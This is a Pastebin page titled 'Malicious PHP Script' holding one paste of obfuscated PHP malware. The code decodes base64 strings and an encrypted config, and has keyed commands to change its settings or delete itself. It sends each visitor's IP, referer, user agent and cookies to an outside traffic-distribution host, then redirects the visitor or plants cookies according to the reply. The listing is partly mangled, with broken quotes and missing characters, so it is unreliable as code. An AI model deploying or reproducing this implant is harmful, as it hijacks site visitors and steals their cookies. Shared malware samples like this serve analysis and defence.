SHARE
TWEET

Malicious PHP Script

scurit May 2nd, 2014 213 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php $cfg=+QSJZL4Pg2WVWtNln9Yoe1TAyFvKL9XTGDAt9Zd5jDKNlFFlBu8Q8jc+HG75LotDntW5a9pwOVEQ55zwoCax2M0zzsuUrDvVco+UsnSOy4dRxSq9OHZgMmm2oIiMp3RjsCbbN3yJ7a/vgF71LWp5dx+n4kmDaNOC+OT/kg2T7MxCEP3/i15JMBXDykpuYAblgKqCGQnkaMevjUjSteGMQUqAKICtZ2pnyJT8iL0o1oFU+6fdN5OLQtnAMgIhPOgeKO3T’; ?>
  2. <? function 1583542($i){$a=Array(‘a3FINjJKZzM=,‘OUJWaw==,‘’,’SCo=,’bW9kZQ==,’Y29uZmln’,‘a2V5’,‘a2V5’,‘PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9’,‘a2V5’,‘PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i’,‘dXJs’,‘Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=,‘aXA=,‘Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=,‘a2V5’,‘Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=,‘bGlu’,‘Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==,‘aWQ=,‘Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==,‘c2V0Y29uZmln’,‘a2V5’,‘a2V5’,‘Lw==,‘U0NSSVBUX05BTUU=,‘dXJs’,‘cHRkcw==,‘aXA=,‘cHRkc2lw’,‘bGlu’,‘cHRv’,‘aWQ=,‘cGVzZGlk’,‘a2V5’,‘cGtleQ==,‘dw==,‘’,’U2F2ZWQuCg','a2lsbA‘,’a2V5’,‘a2V5’,‘Nzc3’,‘U0NSSVBUX0ZJTEVOQU1F’,‘U0NSSVBUX0ZJTEVOQU1F’,‘b2sK’,‘Lw==,‘dXJs’,‘aXA=,‘aXA=,‘aHR0cDovLw==,‘SFRUUF9IT1NU’,‘U0NSSVBUX05BTUU=,‘SFRUUF9SRUZFUkVS’,‘UkVNT1RFX0FERFI=,‘bm8=,‘SFRUUF9YX0ZPUldBUkRFRF9GT1I=,‘eWVz’,‘SFRUUF9VU0VSX0FHRU5U’,‘aWQ=,‘aWQ=,‘a2V5’,‘Jg==,‘a2V5’,‘PQ==,‘UVVFUllfU1RSSU5H’,‘R0VUIA==,‘dXJs’,‘P2RvbT0=,‘JnJlZj0=,‘JmlwPQ==,‘JnByb3g9’,‘JmFnZW50PQ==,‘JmNvb2tpZT0=,‘JmVzZGlkPQ==,‘aWQ=,‘JmZyYW1laWQ9’,‘IEhUVFAvMS4wDQo=,‘R0VUIA==,‘dXJs’,‘P2RvbT0=,‘JnJlZj0=,‘JmlwPQ==,‘JnByb3g9’,‘JmFnZW50PQ==,‘JmNvb2tpZT0=,‘JmVzZGlkPQ==,‘aWQ=,‘IEhUVFAvMS4wDQo=,‘SG9zdDog’,‘DQo=,‘Q29ubmVjdGlvbjogQ2xvc2UNCg0K’,‘DQo=,‘ZG8=,‘ZG8=,‘IA==,‘bGlu’,‘MjAw’,‘bGlu’,‘Oi8v’,‘aHR0cA==,‘SFRUUC8xLjEgMzAyIEZvdW5k’,‘TG9jYXRpb246IA==,‘Y29vaw==,‘Jg==,‘PQ==,‘ZWNobw==);return base64_decode($a[$i]);} ?><?php error_reporting(0);$key=1583542(0);function string_cpt($String,$Password){$Salt=1583542(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=1583542(2);while(strlen($Gamma)<$StrLen){$Seq=pack(_1583542(3),sha1($Gamma .$Seq .$Salt));$Gamma .= substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(stringcpt(base64decode($cfg),$key));$mode=$REQUEST[1583542(4)];if($mode == 1583542(5)AND $c1583542(6)]== $REQUEST[1583542(7)]){echo 1583542(8) .$REQUEST1583542(9)] .1583542(10) .$c1583542(11)] .1583542(12) .$c1583542(13)] .1583542(14) .$c[1583542(15)] .1583542(16) .$c[1583542(17)] .1583542(18) .$c[1583542(19)] .1583542(20);die();}if($mode == 1583542(21)AND $c1583542(22)]== $REQUEST1583542(23)]){$sn=explode(1583542(24),$SERVER1583542(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa0;$file=file($scr);for($i=0;$i<sizeof($file);$i++)if($i == 0){$c1583542(26)]=$POST1583542(27)];$c1583542(28)]=$POST1583542(29)];$c[_1583542(30)]=$POST[1583542(31)];$c[1583542(32)]=$POST[1583542(33)];$c[1583542(34)]=$POST[1583542(35)];$cfg=base64encode(stringcpt(serialize($c),$key));$file[$i]=<?\$cfg=$cfg’; ?>\n”;}$fp=fopen($scr,1583542(36));if(fputs($fp,implode(1583542(37),$file)))die(1583542(38));fclose($fp);}if($mode == 1583542(39)AND $c1583542(40)]== $REQUEST1583542(41)]){chmod(1583542(42),$SERVER1583542(43)]);if(unlink($SERVER1583542(44)]))die(1583542(45));}$dom=explode(1583542(46),$c1583542(47)]);$dom=$dom2;$dhost=$dom;if($c1583542(48)]){$dom=$c1583542(49)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{$t_dom=urlencode(1583542(50) .$SERVER1583542(51)] .$SERVER1583542(52)]);$t_ref=urlencode($SERVER1583542(53)]);$t_ip=urlencode($SERVER1583542(54)]);$t_prox=1583542(55);if($SERVER1583542(56)]){$t_prox=1583542(57);}$t_agent=urlencode($SERVER1583542(58)]);if(isset($GET1583542(59)]))$t_frameid=urlencode($GET1583542(60)]);foreach($COOKIE as $c1583542(61)]=> $val){$t_cookie=$t_cookie .1583542(62) .$c1583542(63)] .1583542(64) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[1583542(65)]);}if(isset($tframeid)){$out=1583542(66) .$c[1583542(67)] .1583542(68) .$tdom .1583542(69) .$tref .1583542(70) .$tip .1583542(71) .$tprox .1583542(72) .$tagent .1583542(73) .$tcookie .1583542(74) .$c[1583542(75)] .1583542(76) .$tframeid .1583542(77);}else{$out=1583542(78) .$c[1583542(79)] .1583542(80) .$tdom .1583542(81) .$tref .1583542(82) .$tip .1583542(83) .$tprox .1583542(84) .$tagent .1583542(85) .$tcookie .1583542(86) .$c[1583542(87)] .1583542(88);}$out .= 1583542(89) .$dhost .1583542(90);$out .= _1583542(91);fwrite($fp,$out);while(!feof($fp)){$str=fgets($fp,128);$ch .= $str;if($str == 1583542(92)&& empty($he)){$he=1583542(93);}if($he == 1583542(94)){$goto .= $str;}}fclose($fp);}$goto=substr($goto,2);$ch=explode(_1583542(95),$ch);if($res){$goto=$c[1583542(96)];}if($ch1== 1583542(97)){}else{$goto=$c[_1583542(98)];}$gotoe=explode(1583542(99),$goto);If($gotoe0== 1583542(100)){header(1583542(101));header(1583542(102) .$goto);}$gotobody=substr($goto,7);If($gotoe0== 1583542(103)){$gotoee=explode(1583542(104),$gotobody);foreach($gotoee as $setcook){$set=explode(1583542(105),$setcook);setcookie($set0,$set1);}}If($gotoe0== 1583542(106)){echo $gotobody;} ?>
RAW Paste Data
Top